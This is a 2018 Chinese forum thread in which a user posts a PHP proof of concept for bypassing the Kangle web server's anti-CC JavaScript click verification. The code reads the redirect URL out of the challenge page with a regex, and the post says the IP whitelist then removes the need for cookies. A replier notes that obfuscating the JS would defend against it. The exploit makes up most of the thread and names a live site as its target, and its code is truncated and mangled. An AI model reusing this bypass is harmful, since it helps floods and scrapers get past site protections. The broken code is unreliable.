找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 53|回复: 5

kangle防cc JS点击验证 绕过过程 poc

[复制链接]

7

主题

70

回帖

171

积分

注册会员

积分
171
发表于 2018-12-26 22:05:14 | 显示全部楼层 |阅读模式
Kangle默认的点击验证很简单 通过正则匹配即可完全bypass 其次kangle存在ip白名单 如短时间内通过一次验证 则无需cookie也可直接访问网站内容

贴上POC

$value) {
if ($urlencode) {
$temp .= rawurlencode(rawurlencode($key)) . ‘=’ . rawurlencode(rawurlencode($value)) . ‘&’;
} else {
$temp .= $key . ‘=’ . $value . ‘&’;
}
}
$requestData = substr($temp, 0, strlen($temp) – 1);
}
curl_setopt($ch, CURLOPT_POSTFIELDS, $requestData);
}

$result = curl_exec($ch);

curl_close($ch);

return $result;
}

function isSafe($html)
{
return preg_match(‘/安全防护系统/’, $html) == 1;
}

function getSafeUrl($cookie_jar,$url)
{
$data = curl($cookie_jar,$url);

if (isSafe($data)) {
preg_match(‘/location.href =(.+);/’, $data, $result);
if (count($result) == 2) {
$result = $result[1];
$result = preg_replace(‘/”|\+/’, ”, $result);
$result = preg_replace(‘/\s/’, ”, $result);
return $url . $result;
}
}
return ”;
}
echo curl($cookie_jar,getSafeUrl($cookie_jar,”https://www.wafcloud.net/”));
回复

使用道具 举报

7

主题

70

回帖

171

积分

注册会员

积分
171
 楼主| 发表于 2018-12-26 22:06:23 | 显示全部楼层
防御方式也很简单 最起码js稍微混淆一下。
回复

使用道具 举报

32

主题

580

回帖

1288

积分

金牌会员

积分
1288
发表于 2018-12-26 22:17:52 | 显示全部楼层
很少人用kangle了吧
回复

使用道具 举报

63

主题

409

回帖

1057

积分

金牌会员

积分
1057
发表于 2018-12-26 22:20:25 | 显示全部楼层

小奶狗 发表于 2018-12-26 22:23

小樱早就写出来了,加个注悉就很6吗

小樱是谁?
回复

使用道具 举报

17

主题

259

回帖

597

积分

高级会员

积分
597
发表于 2018-12-26 22:23:27 | 显示全部楼层
"

小樱都不认识啊,玩Kangle最溜的那个,itzmx。你是发福吗。
回复

使用道具 举报

7

主题

70

回帖

171

积分

注册会员

积分
171
 楼主| 发表于 2018-12-27 00:14:30 | 显示全部楼层

Titan 发表于 2019-1-13 22:52

小樱都不认识啊,玩Kangle最溜的那个,itzmx。你是发福吗。

不用kangle啊。。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋|Discuz! X

GMT+8, 2025-4-23 02:01 , Processed in 0.017011 second(s), 4 queries , Gzip On, Redis On.

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表